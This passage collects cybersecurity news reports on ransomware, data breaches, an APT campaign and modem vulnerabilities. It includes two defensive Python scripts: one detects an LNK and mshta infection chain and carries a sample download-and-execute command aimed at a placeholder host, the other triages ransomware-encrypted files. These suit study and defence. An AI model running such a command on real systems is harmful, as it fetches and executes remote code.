Despite the attack, there was no immediate threat to student safety. Classes continued as usual, albeit with a return to traditional, technology-free teaching methods. Superintendent Matthews reassured parents that security systems for school doors remained functional, and emergency cell phones were made available for parental contact. The FBI was also involved in the investigation, working alongside district staff to assess the extent of the breach. Superintendent Matthews acknowledged the initial challenge but noted that staff were quickly adjusting to the incident. Students reported a unique experience of learning without digital tools, while some found the situation disconcerting. Parents were informed about the situation through emergency communication channels. While some parents chose to pick up their children early, the overall response was one of cautious adaptation.

Following the preventative measures, the district restored its computer systems 24 hours later, with the superintendent stating that the incident had been isolated and contained. The school issued a letter to parents indicating that students and staff could resume using district-provided equipment or their own personal devices.

Expert Indicates Educational Institutes as Common Ransomware Target

Cybersecurity expert Greg Gogolin from Ferris State University noted in response to the incident that school districts are common targets for ransomware attacks due to inadequate preventive measures and limited cybersecurity staff. Gogolin highlighted that the end of the school year is a particularly vulnerable time for such attacks, as the urgency to resolve the situation increases with grades due and other academic deadlines approaching. Affluent districts are particularly targeted because attackers perceive them as having more resources available.

To mitigate such risks, Gogolin advises districts to invest in advanced email filtering while educating staff about phishing emails. Additionally, teachers and students should maintain backups of essential data, such as grades and assignments, outside of school networks. The return to traditional schooling methods following the Rockford Public Schools ransomware attack is reminiscent of an earlier incident affecting Cannes Hospital, which forced its staff to resort to pen-and-paper techniques to keep services running.

Josh Krueger of Project Hosts, Inc. Appointed to Federal Secure Cloud Advisory Committee

By: Alan J
16 May 2024 at 07:10

FSCAC Federal Secure Cloud Advisory Committee

Josh Krueger, the Chief Information Security Officer at Project Hosts, Inc., has been appointed to the Federal Secure Cloud Advisory Committee (FSCAC). This committee plays a crucial role in advising the Federal Risk and Authorization Management Program (FedRAMP) on various aspects of cloud computing adoption and security. The FSCAC appointment recognizes Mr. Krueger's expertise and Project Hosts' ongoing efforts to support secure cloud-computing practices and compliance standards, benefiting both users and providers of cloud services.

The Federal Risk and Authorization Management Program (FedRAMP) is a government-wide compliance initiative in the United States that offers a standardized framework for security assessment, authorization, and continuous monitoring of cloud products and services.

FSCAC Appointment Includes New Chair and Three Members

Along with Josh Krueger's appointment, Lawrence Hale, the deputy assistant commissioner within the Office of Information Technology Category Management for GSA's Federal Acquisition Service, will serve as the new chair of the FSCAC. In this capacity, Hale will act as a liaison and spokesperson for the committee's work products, in addition to his oversight responsibilities. Josh Krueger and Kayla Underkoffler, the lead security technologist at HackerOne, will fill the vacant seats. Krueger's term will run through July 9, 2026, while Underkoffler's term will end on May 14, 2025. Carlton Harris, the senior vice president of End to End Solutions, has been appointed as the third new member of the FSCAC, with a three-year term ending on May 14, 2027. While not among the recent appointees, Michael Vacirca, a senior engineering manager at Google, has been reappointed to the federal panel for a full three-year term after serving for one year. His term will conclude on May 14, 2027.

As an appointed Representative Member of the FSCAC, Mr. Josh Krueger is expected to bring unique perspectives to the delivery of FedRAMP's Compliance-as-a-Service solutions. The role will involve representing the needs and viewpoints of businesses both small and large in the cloud-computing industry, and ensuring their interests are considered in federal discussions and strategies around cloud adoption.

Responsibilities of the Federal Secure Cloud Advisory Committee

The FSCAC was formed by the General Services Administration in February 2023, in compliance with the FedRAMP Authorization Act of 2022, which is part of the National Defense Authorization Act for fiscal year 2023. The committee's primary responsibilities include advising and providing recommendations to the GSA Administrator, the FedRAMP Board, and various agencies on technical, financial, programmatic, and operational matters related to the secure and effective adoption of cloud computing products and services across different sectors.

The committee also plays a significant role in examining the operations of FedRAMP, seeking ways to continually improve authorization processes, and collecting information and feedback on agency compliance with the implementation of FedRAMP requirements. Additionally, the FSCAC serves as a forum for communication and collaboration among all stakeholders within the FedRAMP community. The FSCAC will hold an open meeting on May 20th to discuss its next priorities, which are expected to further enhance the security and adoption of cloud computing solutions across the federal government.

GhostSec Announces Shift in Operations from Ransomware to Hacktivism

By: Alan J
16 May 2024 at 04:49

GhostSec Announces Shift in Operations from Ransomware to Hacktivism

GhostSec, a threat actor group previously involved in financially motivated cybercrime, announced a significant shift in focus, departing from cybercrime and ransomware operations and returning to its original hacktivist aims. The announcement of GhostSec's return to its hacktivism roots marks a notable change in the group's priorities and operational strategies, leading several observers to speculate that the departure follows recent law enforcement efforts against international ransomware groups.

The GhostSec group identifies itself as part of the Anonymous collective and is known to have been active since 2015. The group used hashtags such as #GhostSec or #GhostSecurity to promote its activities and was previously involved in the #OpISIS, #OpNigeria, and #OpIsrael campaigns.

GhostSec Will Transfer Existing Ransomware Clients to Stormous

In an announcement made on its Telegram channel, the GhostSec group stated that it had gathered sufficient funds from its ransomware operations to support other activities moving forward. Rather than completely abandoning its previous work, the transition includes transferring existing clients to the new Stormous locker operated by Stormous, a partner organization with whom the group will also share the source code of the V3 Ghostlocker ransomware strain.

[Image: GhostSec announcement. Source: GhostSec Telegram Channel]

The group claims that these efforts will ensure a smooth transition to Stormous' services, while avoiding the exit scams or disruption risks typically associated with ransomware exits. Stormous will also take over GhostSec's associates within the Five Families collective, which previously consisted of GhostSec, ThreatSec, Stormous, BlackForums, and SiegedSec.

While GhostSec will halt some of its earlier services, the group intends to maintain its private channel and chat room. The group announced a discount offer starting today and lasting until May 23rd for lifetime access to its private channel and chat room, reducing the price from $400 to $250. The group also suggested the possibility of offering a hacking course, although the details are still being debated.

GhostSec Returns to Hacktivism

The announcement expressed GhostSec's intention to focus solely on hacktivism, a form of activism that employs hacking to promote social or political agendas. GhostSec has a record of intense hacktivist operations and campaigns, such as its successful efforts in 2015 to take down hundreds of ISIS-associated websites and social media accounts, reportedly halting potential terrorist attacks. The group used social media hashtags like #GhostSec, #GhostSecurity, or #OpISIS to promote its activities and participate in hacktivist initiatives against the terrorist group.

GhostSec also promoted a project ("New Blood") to help newcomers pick up hacking skills and participate in its campaigns, and provided resources to help activists anonymize their identities, such as WeFreeInternet, a project that sought to offer free VPN facilities to Iranian activists. The group had stated its intent to expand the project to support activists in similar circumstances whose internet access was restricted by governments worldwide. The official GhostSec Telegram channel where the announcement took place was created on October 25, 2020, and the group is known to use its social media handles on various websites to promote its activities.

It is important to note that the group's decision to depart from the cybercrime scene does not necessarily imply a shift towards more ethical practices. Furthermore, the group's involvement in financially motivated cybercrime raises questions about its true motivations and the potential for its hacktivism to be used for personal gain or a dubious political agenda rather than genuine social change.

Banco Santander Confirms Data Breach, Assures Customers’ Transactions Remain Secure

By: Alan J
15 May 2024 at 06:30

Santander Data Breach

Santander, one of the largest banks in the eurozone, confirmed that an unauthorized party had gained access to a database containing customer and employee information. The Banco Santander data breach is stated to stem from a database held by a third-party provider and to be limited to some of the bank's customers in specific regions where it operates, as well as some of its current and former employees. The bank's own operations and systems are reportedly unaffected.

Banco Santander is a banking services provider founded on March 21, 1857 and headquartered in Madrid, Spain. The provider operates across Europe, North America, and South America. Its services include global payment services, online banking and digital assets.

Customer and Employee Data Compromised in Santander Data Breach

The bank reported that upon becoming aware of the data breach, it immediately implemented measures to contain the incident, such as blocking access to its database from the compromised source and establishing additional fraud prevention mechanisms to protect impacted customers and affected parties. After conducting an investigation, the bank determined that the leaked information stemmed from a third-party database and consisted of details of customers of Santander in Chile, Spain and Uruguay, along with some data on current and former Santander employees. Despite the third-party database breach, customer data from Santander markets and businesses operating in other regions were not affected.

[Image: Santander data breach statement. Source: santander.com]

The bank apologized for the incident and acknowledged concerns arising from the data breach, taking action to directly notify the affected customers and employees. The security team also informed regulators and law enforcement of the incident details, stating that the bank would continue to work with them during the investigation. Santander assured its customers that no transactional data, nor transaction-facilitating credentials such as banking details and passwords, were contained in the database. The statement reported that neither the bank's operations nor its systems were affected, and that customers could continue to transact securely.

Along with its official statement on the data breach, the bank provided additional advice on its site for dealing with the incident:
  • Santander will never ask you for codes, OTPs or passwords.
  • Always verify information you receive and contact us through official bank channels.
  • If you receive any suspicious message, email or SMS report it to your bank directly or by contacting reportphishing@gruposantander.com.
  • Never access your online banking via links from suspicious emails or unsolicited emails.
  • Never ignore security notifications or alerts from Santander related to your accounts.

Financial and Banking Sector Hit By Data Breaches

Increased cyber threats and third-party database exposures such as the Santander data breach pose serious concerns for stability within the financial and banking sector. The International Monetary Fund noted in a blog post last month that these incidents could erode confidence in the financial system, disrupt critical services, or cause spillovers to other institutions. In March, the European Central Bank instructed banks within the European region to implement stronger measures in anticipation of cyber attacks. Earlier, the body had stated that it would conduct a resilience stress test on at least 109 of its directly supervised banks in 2024. The initiatives come as part of broader concern about the security of European banks. Last year, data from Deutsche Bank AG, Commerzbank AG and ING Groep NV was compromised after the CL0P ransomware group exploited a security vulnerability in the MOVEit file transfer tool.

The European Central Bank's site states that its banking supervisors rely on the stress tests to gather information on and assess how well the banks would be able to cope with, respond to and recover from a cyberattack, rather than just their ability to prevent attacks. The response and recovery assessments are described as including the activation of emergency procedures and contingency plans as well as the restoration of usual operations. The site states that the test results would then be used to help supervisors identify weaknesses to be discussed in dialogue with the banks.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

SideCopy APT Campaign Found Targeting Indian Universities

By: Alan J
15 May 2024 at 03:48

SideCopy APT Campaign Found Targeting Indian Universities

Cyble Research and Intelligence Labs (CRIL) researchers have uncovered a new SideCopy campaign. The threat actor group has previously been observed targeting South Asian nations with a particular focus on government and military targets in India and Afghanistan. Active since May 2023, the campaign targets university students through sophisticated infection chains involving malicious LNK files, HTAs, and loader DLLs disguised as legitimate documents. Ultimately, the campaign deploys malware payloads such as Reverse RAT and Action RAT, granting attackers extensive control over infected devices. The research explores the tactics employed by SideCopy, such as their recent focus on university students, and potential overlap in activities with the Transparent Tribe APT group.

Technical Analysis of the SideCopy Campaign Infection Chain

In early May, CRIL identified a malicious domain employed by the SideCopy group in their operations. The website was discovered hosting a ZIP archive named "files.zip" that contained sub-directories labeled "economy," "it," and "survey." The survey directory included files similar to those previously employed by SideCopy in earlier campaigns.

(Image: SideCopy campaign and Transparent Tribe overlap. Source: Cyble)

The campaign likely employs spam emails to distribute the malicious ZIP archive hosted on the compromised website as the initial infection vector. These archives contain malicious LNK files disguised as legitimate documents, such as "IT Trends.docx.lnk." Upon execution, the LNK files trigger a series of commands that download and execute a malicious HTA file. The downloaded HTA files contain embedded payloads along with additional lure documents and DLL files. The lure documents are typically themed around current affairs or relevant academic topics so that they appear legitimate to the targeted demographic.

(Image: SideCopy campaign infection chain. Source: Cyble Blog)

(Image: SideCopy campaign infection chain, antivirus bypass. Source: Cyble Blog)

The malware is crafted to adapt to the presence of different antivirus software such as Avast, Kaspersky and Bitdefender, which further amplifies its ability to evade detection, and it ensures persistence by placing the LNK shortcut files in the startup folder. The attack process ultimately leads to the deployment of malicious payloads such as Reverse RAT and Action RAT onto the victim system, which then connect to a remote Command-and-Control (C&C) server to commence malicious activities.
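As an added illustration of the chain just described (not code from the Cyble report), the following constructed telemetry check flags its observable stages on a defender's side: a shortcut named like a document, mshta.exe fetching a remote .hta, and a shortcut landing in the Startup folder. The event format, paths, user name and the placeholder.invalid URL are all assumptions.

```python
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Shortcut whose name ends in a document extension followed by .lnk, e.g. "IT Trends.docx.lnk".
DOC_MASQUERADE_LNK = re.compile(r"\.(docx?|xlsx?|pptx?|pdf)\.lnk$", re.IGNORECASE)
# Per-user or all-users Startup folder, where the report says the LNK is placed for persistence.
STARTUP_FOLDER = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
# mshta.exe handed a remote .hta URL (the download-and-execute step of the chain).
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)
# Script hosts and shells the researchers recommend restricting; used for the parent check.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "mshta.exe"}


def classify_event(event: Event) -> List[str]:
    """Return the names of every rule the event matches (empty list means nothing fired)."""
    hits: List[str] = []
    if event["type"] == "file":
        path = event["path"]
        if DOC_MASQUERADE_LNK.search(path):
            hits.append("lnk_document_masquerade")
        if path.lower().endswith(".lnk") and STARTUP_FOLDER.search(path):
            hits.append("lnk_startup_persistence")
    elif event["type"] == "process":
        image = event["image"].lower()
        if image == "mshta.exe" and REMOTE_HTA.search(event["cmdline"]):
            hits.append("mshta_remote_hta")
        # A shortcut launch arrives as explorer.exe -> cmd.exe; one script host spawning
        # another is the middle of that chain and rarely legitimate on a student laptop.
        if image in SCRIPT_HOSTS and event["parent"].lower() in SCRIPT_HOSTS:
            hits.append("script_host_chain")
    return hits


def detect(events: List[Event]) -> List[Tuple[int, str]]:
    """Run every rule over a batch of events; returns (event index, rule name) pairs."""
    findings: List[Tuple[int, str]] = []
    for idx, event in enumerate(events):
        for rule in classify_event(event):
            findings.append((idx, rule))
    return findings


# Constructed telemetry mimicking the chain: archive extraction, shortcut execution,
# HTA download, persistence. Paths, user name and URL are placeholders, not from the report.
SAMPLE_EVENTS: List[Event] = [
    {"type": "file", "image": "explorer.exe",
     "path": r"C:\Users\student\Downloads\files\survey\IT Trends.docx.lnk"},
    {"type": "process", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c start /min mshta.exe http://placeholder.invalid/survey/x.hta"},
    {"type": "process", "parent": "cmd.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://placeholder.invalid/survey/x.hta"},
    {"type": "file", "image": "mshta.exe",
     "path": r"C:\Users\student\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svc.lnk"},
    # Benign activity that must not fire: a real document and a locally installed HTA tool.
    {"type": "file", "image": "WINWORD.EXE",
     "path": r"C:\Users\student\Documents\IT Trends.docx"},
    {"type": "process", "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
]

if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```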

Intersection with Transparent Tribe Activities

The research further suggests a potential overlap or collaboration between SideCopy and Transparent Tribe, another APT group known for targeting Indian military and academic institutions. This intersection hints at possible collaborative efforts or shared objectives between the two groups, with researchers previously noting that SideCopy may function as a sub-division of Transparent Tribe. SideCopy is also known to emulate tactics of the Sidewinder APT group in the distribution of malware files, such as the use of disguised LNK files to initiate a complex chain of infections. CRIL researchers have advised the use of strong email filtering systems, exercising caution, deploying network-level monitoring and disabling scripting hosts such as PowerShell, MSHTA and cmd.exe to protect against this potential threat.

Millions of IoT Devices at Risk from Cinterion Modem Vulnerabilities

By: Alan J
14 May 2024 at 03:12

Cinterion Modem Vulnerabilities

Millions of Internet of Things (IoT) devices present across the industrial, healthcare, automotive, financial, and telecommunication sectors are at significant risk due to several vulnerabilities in a widely used cellular modem technology. These Cinterion modem vulnerabilities, found in modems manufactured by Telit Cinterion, pose severe threats to device integrity and network security. Telit Cinterion is an Internet of Things (IoT) technology provider headquartered in Irvine, California, United States. It provides various edge-to-cloud IoT services such as connectivity plans, IoT SIMs, IoT embedded software and PaaS IoT deployment managed services. The newly discovered vulnerabilities pose significant risks to communication networks and IoT devices, potentially leading to extensive global disruption.

Several Cinterion Modem Vulnerabilities Discovered

The findings by Kaspersky researchers were first presented at the OffensiveCon international security conference held recently in Berlin. The findings disclosed the identification of several critical vulnerabilities in Cinterion modems integrated into a wide range of IoT devices. These vulnerabilities include remote code execution (RCE) and unauthorized privilege escalation flaws that exist in user applications (MIDlets) and the OEM-bundled firmware integrated with the modems.

The most severe vulnerability, CVE-2023-47610, is a heap memory overflow that allows attackers to remotely execute arbitrary commands on affected devices through specially crafted SMS messages, without requiring further authentication or any physical access. This vulnerability can also unlock access to special AT commands, enabling attackers to read and write the modem's RAM and flash memory. The researchers demonstrated its existence by developing their own SMS-based file system, which they installed on the modem by exploiting the identified vulnerability. This allowed the researchers to then remotely activate OTA (Over The Air Provisioning) to install arbitrary MIDlets that were protected from removal by standard mechanisms and required a full reflash of the firmware to remove.

In addition to the RCE vulnerability, researchers also identified several security issues in user applications called MIDlets and in the OEM-bundled firmware of the modems. These vulnerabilities, assigned CVE-2023-47611 through CVE-2023-47616, could potentially allow attackers with physical access to the modem to compromise the confidentiality and integrity of user MIDlets, execute unauthorized code, extract and substitute digital signatures, and elevate execution privileges of user MIDlets to the manufacturer level.
The researchers reported these vulnerabilities to Telit Cinterion last November and while the company has issued patches for some of the flaws, not all of them have been addressed, leaving millions of devices still at risk. The modems are embedded in various IoT products, including industrial equipment, smart meters, telematics systems, and medical devices, making it challenging to compile a comprehensive list of affected products. To mitigate potential threats, organizations are advised to disable non-essential SMS messaging capabilities, employ private Access Point Names (APNs), control physical access to devices, and conduct regular security audits and updates.

Rising Concerns Over IoT Security

The discovery of these vulnerabilities highlights a growing concern over the security of IoT environments, especially in industrial control and operational technology settings. An analysis of 2023 threat data by Nozomi Networks noted a significant increase in attacks targeting IoT and OT networks, driven by a rise in IoT vulnerabilities. Previous incidents, such as the nine vulnerabilities found in Robustel R1510 industrial routers, indicate that routers remain a common point of weakness in networks, with vulnerabilities such as remote code execution or DDoS flaws that may then be used to spread attacks across connected devices. In conclusion, these vulnerabilities in Cinterion modems necessitate urgent action from both device manufacturers and telecom operators to mitigate risks and protect essential infrastructure. The researchers behind the findings plan to publish a white paper on modem security internals within May 2024, following the findings from this study.

Christie’s Auction Website Hacked Just Before Major Sales

By: Alan J
13 May 2024 at 06:27

Christie’s Auction House

Just days before its highly anticipated spring art auctions, Christie's, the renowned auction house, fell victim to a cyberattack that took its website offline and raised concerns about the security of client data. The Christie's auction house cyberattack has sent shockwaves through the art world, with collectors, advisers, and dealers scrambling to adapt to the sudden disruption. Christie's is a British auction house founded in 1766 by James Christie, offering around 350 different auctions annually in over 80 categories, such as decorative and fine arts, jewelry, photographs, collectibles, and wine. The auction house has a global presence in 46 countries, with 10 salerooms worldwide, including London, New York, Paris, Geneva, Amsterdam, Hong Kong, and Shanghai. The company provided a temporary webpage after its official website was taken down and later announced that the auctions would proceed despite the setbacks caused by the cyberattack.

Christie’s Auction House Cyberattack Occurs Ahead of Major Auctions

(Image: Christie's auction house cyberattack. Source: Shutterstock)

The cyberattack came at an inopportune time for Christie's, with several high-stakes auctions estimated at around $850 million in worth scheduled to take place in New York and Geneva. Art adviser Todd Levin highlighted the significance of the timing, expressing concern that the cyberattack was happening during a pivotal moment before the spring sales, when buyers confirm their interest in artworks. He raised a pressing question: "How can potential bidders access the catalog?" The auctions will include works by Warhol, Basquiat, and Claude Monet, and pieces from the Rosa de la Cruz Collection, which are expected to generate hundreds of millions of dollars in revenue. Christie's website was taken offline following the hack, which affected some of its systems. Despite the setback, Christie's has assured clients that the auctions will proceed as planned, with bidders able to participate in person, by phone, or through the Christie's Live platform. Christie's CEO Guillaume Cerutti assured clients that all eight live auctions in New York and Geneva would proceed as scheduled, with the exception of the Rare Watches sale, which was postponed to May 14th. In a statement, Cerutti elaborated: "I want to assure you that we are managing this incident according to our well-established protocols and practices, with the support of additional experts. This included, among other things, the proactive protection of our main website by taking it offline."

Growing Cybersecurity Concerns in the Art World

The incident is a sobering reminder of the increasing threat of cyberattacks in the art world. In recent years, several museums and art market platforms have fallen victim to hacking, highlighting the need for vigilance in protecting sensitive client information amid sluggish sales. Earlier in January, a service provider managing the online collections of several prominent museums had been targeted, affecting institutions like The Museum of Fine Arts in Boston, the Rubin Museum of Art in New York, and the Crystal Bridges Museum of American Art. In 2023, another Christie's security incident came to light when the auction house was discovered to be inadvertently exposing the GPS coordinates of several art pieces purchased by some of the world's biggest and wealthiest collectors, revealing their exact whereabouts. In 2017, hackers employed an email scam to intercept payments between dealers and clients, siphoning sums ranging from Β£10,000 to Β£1 million. These incidents underscore the art world's vulnerability to such threats. As the market becomes increasingly digital, auction houses and museums must take proactive steps to invest in stronger defenses against a rapidly evolving cyber threat landscape and the risks it poses to the art industry.

Hacker Offers Data Allegedly Stolen from the City of New York

By: Alan J
13 May 2024 at 03:45

City of New York Data Breach

An unidentified threat actor known as "pwns3c" has offered for sale on BreachForums access to a database purported to contain sensitive data and documents from a City of New York data breach. The City of New York website is the official digital representation of the city's government and provides access to related information such as alerts, 311 services, news, programs and events within the city. The claims made in the post, despite their unverified nature, raise significant concerns about the extent of the data breach as well as the security practices followed by the government office.

Alleged City of New York Data Breach Claimed to Include Sensitive Data

The database is alleged to include 199 PDF files, approximately 70MB in size in total. The exposed data reportedly includes a wide range of personally identifiable information (PII), such as: Licensee Serial Number, Expiration Date, Applicant or Licensee Name, Trade Name, Street Address, City, Zip Code, Phone Number of Applicant, and Business Email of Applicant. Moreover, the data also reveals sensitive details about building owners, attorneys, and individuals, including their EIN, SSN, and signature. The threat actor is selling this sensitive information for a mere $30, and interested buyers are instructed to contact them through private messages within BreachForums or through their Telegram handle. The post seemingly includes links to download samples of the data allegedly stolen in the attack.

(Image: Alleged City of New York data breach post. Source: BreachForums)

The alleged data breach has far-reaching implications, as it puts the personal information of numerous individuals at risk. The leak of personally identifiable information (PII) and sensitive documents exposes individuals to potential risks of identity theft, fraud, and other malicious activities. The Cyber Express team has reached out to the New York City mayor's official press contact email for confirmation. However, no response has been received as of yet.

pwns3c Earlier Claimed to have Hacked Virginia Department of Elections

In an earlier post on BreachForums, pwns3c claimed an alleged data breach against the Virginia Department of Elections, compromising at least 6,500 records. The earlier stolen data was also offered for USD 30 in Bitcoin (BTC), Litecoin (LTC), or Monero (XMR) on the dark web. The Virginia Department of Elections is responsible for providing and overseeing open and secure elections for the citizens of the Commonwealth of Virginia. It is responsible for voter registration, absentee voting, ballot access for candidates, campaign finance disclosure and voting equipment certification in coordination with about 133 of Virginia's local election offices. The compromised data was allegedly stated to have included sensitive information such as timestamps, usernames, election data, candidate information, and voting method details. However, there has been no official confirmation of the stated incident as of yet. The breaches claimed by pwns3c, despite their unverified nature, highlight the persistent challenges of securing the websites of government institutions. The sensitive nature of the stolen data, which may allegedly include Social Security Numbers (SSNs), contact information, election-related details, and signatures, underscores the urgency for government websites to strengthen their security measures.

Researchers Observe Potential Ties between Trinity and Venus Ransomware Strains

By: Alan J
12 May 2024 at 23:56

Trinity ransomware Venus ransomware CYBLE

Cybersecurity researchers at Cyble's Research and Intelligence Labs (CRIL) have uncovered a new ransomware variant called Trinity, which employs a double extortion strategy and has potential links to the previously identified Venus ransomware. This article explores the findings about the Trinity ransomware strain as well as the noted similarities between the Trinity and Venus ransomware strains.

Uncovering Tactical and Technical Details of Trinity Ransomware

CRIL researchers observed a new ransomware variant called Trinity that employs common double extortion tactics, such as exfiltrating data from victims' systems before encrypting them, and intends to use both a support site and a leak site in its operations. The support site allows victims to upload sample files smaller than 2MB for decryption, while the leak site, though currently empty, threatens to expose victim data.

(Image: Trinity ransomware sites. Source: Cyble Blog)

In the initial stages of the investigation, researchers observed similarities between the Trinity ransomware and the 2023Lock ransomware, which has been active since early 2024. The deep similarities between the two variants, such as identical ransom notes and code, suggest that Trinity might be a newer variant of the 2023Lock ransomware.

Researchers noted an intricate execution process: the ransomware searches for a ransom note within its own binary and immediately terminates if the note is not found. It then collects system information such as the processor count, the thread pool size, and existing drives to prepare its multi-threaded encryption process. The ransomware then attempts privilege escalation by impersonating a legitimate process's token for its own use, enabling it to bypass security measures. The ransomware also performs network enumeration along with lateral movement, demonstrating broad attack capability.

(Image: Trinity ransomware and Venus ransomware comparison. Source: Cyble Blog)

The Trinity variant employs the ChaCha20 algorithm to encrypt victim files. After encryption, filenames are appended with ".trinitylock," while ransom notes are left in both text and .hta formats. The ransomware also changes the desktop wallpaper to display the ransom note and uses a specific registry key to facilitate this change.
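As an added example that is not part of the Cyble write-up, the following triage check uses the two traces described above, the ".trinitylock" extension and the dropped ransom notes, to separate genuinely encrypted files from merely renamed ones by byte entropy (ChaCha20 output is indistinguishable from random bytes). The file names, contents and note marker phrases are constructed assumptions, not samples from the real malware.

```python
import math
import random
from collections import Counter
from typing import Dict, List

EXTENSION = ".trinitylock"
NOTE_EXTENSIONS = (".txt", ".hta")
NOTE_MARKERS = ("your files", "decrypt")  # constructed marker phrases, not the real note text
HIGH_ENTROPY = 7.5  # bits per byte; encrypted or well-compressed data sits close to 8.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 8.0 is the maximum, reached by uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_like_ransom_note(name: str, data: bytes) -> bool:
    """A text or HTA file that names the extension and carries the usual decryption demand."""
    if not name.lower().endswith(NOTE_EXTENSIONS):
        return False
    text = data.decode("utf-8", errors="ignore").lower()
    return EXTENSION in text and all(marker in text for marker in NOTE_MARKERS)


def triage(files: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Sort a directory snapshot into encrypted files, suspicious renames and ransom notes."""
    result: Dict[str, List[str]] = {"encrypted": [], "renamed_plain": [], "ransom_notes": []}
    for name, data in files.items():
        if name.lower().endswith(EXTENSION):
            # The extension alone is not proof: confirm the content is really ciphertext.
            bucket = "encrypted" if shannon_entropy(data) >= HIGH_ENTROPY else "renamed_plain"
            result[bucket].append(name)
        elif looks_like_ransom_note(name, data):
            result["ransom_notes"].append(name)
    return result


def verdict(summary: Dict[str, List[str]]) -> str:
    """Escalate when ciphertext files and a note coexist; either alone is weaker evidence."""
    if summary["encrypted"] and summary["ransom_notes"]:
        return "ransomware_impact"
    if summary["encrypted"] or summary["ransom_notes"]:
        return "suspicious"
    return "clean"


# Constructed snapshot: the "encrypted" bytes are seeded pseudo-random data standing in
# for ChaCha20 output, and the note wording is invented, not quoted from the real sample.
_rng = random.Random(2024)
SAMPLE_FILES: Dict[str, bytes] = {
    "budget.xlsx.trinitylock": bytes(_rng.getrandbits(8) for _ in range(4096)),
    "thesis.docx.trinitylock": bytes(_rng.getrandbits(8) for _ in range(4096)),
    "decoy.trinitylock": b"just a renamed text file " * 200,
    "README.txt": b"Your files have been encrypted with .trinitylock. Contact us to decrypt.",
    "notes.txt": b"meeting at 10, bring the slides",
}

if __name__ == "__main__":
    summary = triage(SAMPLE_FILES)
    print(summary, verdict(summary))
```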

Similarities Between Trinity Ransomware and Venus Ransomware

The connections between Trinity and Venus go beyond mere similarities in their ransom notes and registry usage. Venus, an established ransomware operation with a global reach, emerged around mid-2022. The similarities between Venus and Trinity extend to their use of identical registry values and consistency in their mutex naming conventions and code base. Additionally, the ransom notes used by both ransomware variants exhibit a similar format. The shared tactics and techniques indicate a possible collaboration between the two groups. Such collaboration could lead to the exchange of techniques, tools, and infrastructure, amplifying the scale and sophistication of future ransomware campaigns. CRIL researchers have advised organizations to stay vigilant and implement robust cybersecurity measures to protect against these evolving threats.

TCE Cyberwatch: Weekly Wrap on AI, Deepfakes, Cybersecurity Challenges Affecting Nations Worldwide

By: Alan J
12 May 2024 at 23:56

TCE Cyberwatch

This week on TCE Cyberwatch we’re covering the different data breaches and vulnerabilities faced by different companies. Along with this, the rise of countries using AI and deepfake technology, some consensual and some not, adds depth to the conversation surrounding the security of it all. TCE Cyberwatch aims to bring updates around large-scale and small-scale events to ensure our readers stay updated and stay in the know of cybersecurity news that can impact them. Keep reading to learn about what’s currently trending in the industry.

Dropbox Sign data breached; customers' authentication information stolen

Dropbox, a popular drive and file sharing service, revealed that it had recently faced a security breach which led to sensitive information being exposed. Specifically, Dropbox Sign, a service used to sign documents, was targeted. The data stolen belonged to Dropbox Sign users and included information such as passwords, account settings, names, emails, and other authentication information. Dropbox has rotated and regenerated OAuth tokens and API keys to control the fallout. Dropbox has assured that β€œfrom a technical perspective, Dropbox Sign’s infrastructure is largely separate from other Dropbox services. That said, we thoroughly investigated this risk and believe that this incident was isolated to Dropbox Sign infrastructure, and did not impact any other Dropbox products.” Read More

Cyberattacks on organizations in the UAE claimed by Five Families Alliance member, Stormous Ransomware

Stormous Ransomware has claimed responsibility for cyberattacks on several UAE entities. A ransomware group linked to the Five Families alliance, which is known for targeting UAE entities, Stormous Ransomware has targeted organisations like the Federal Authority for Nuclear Regulation (FANR); Kids.ae, the government’s digital platform for children; the Telecommunications and Digital Regulatory Authority (TDRA), and more. After announcing alleged responsibility for the attacks, the ransomware group demanded 150 BTC, which comes to around $6.7 million USD, and threatened to leak the stolen data if the ransom was not paid. The organisations targeted by the group are yet to speak up about the situation, and tensions are high due to the significant damage these claims could cause. Read More

Russian bitcoin cybercriminal pleads guilty in the U.S. after arrest in France

Alexander Vinnik, a Russian cybercrime suspect, recently pleaded partially guilty to charges in the U.S. Previously arrested in Greece in 2017 on charges of laundering $4 billion through the digital currency bitcoin in France, Vinnik is now set to face trial in California. Vinnik’s lawyer, Arkady Bukh, predicted that Vinnik could get a prison term of less than 10 years due to the plea bargain. The U.S. Department of Justice accused Vinnik of having "allegedly owned, operated, and administrated BTC-e, a significant cybercrime and online money laundering entity that allowed its users to trade in bitcoin with high levels of anonymity and developed a customer base heavily reliant on criminal activity." Read More

Many Android apps on Google Play store now have vulnerabilities that infiltrate them

Popular Android applications have been found to carry a path-traversal vulnerability. Called the Dirty Stream attack, it can be exploited through one of the flagged applications, leading to files being overwritten. The Microsoft Threat Intelligence team stated that β€œthe implications of this vulnerability pattern include arbitrary code execution and token theft, depending on an application's implementation.” The apps affected by this vulnerability are popular, with 500 million to 1 billion downloads. Exploitation would have given the attacker control of the app and access to the user’s data, such as the accounts used. Microsoft is concerned that the issue is broader and has asked developers to focus on security to protect sensitive information. Read More

Department of Social Welfare, Ladakh, in India, allegedly hacked, but no proof provided

Recently, a threat actor allegedly hacked the database of the Department of Social Welfare Ladakh, Government of India. Their claims, however, seemed to have no support: no information was disclosed from their side, and no signs of a breach were detected on the department’s website. However, if the claims are true, the fallout is predicted to be very damaging. Investigations into the claims are currently underway. As neither a motive nor the authenticity of the claims has been confirmed, swift detection and response are important both for the individuals whose data resides in the department's database and for national security. Read More

U.K. military data breach endangers information of current, veteran military personnel

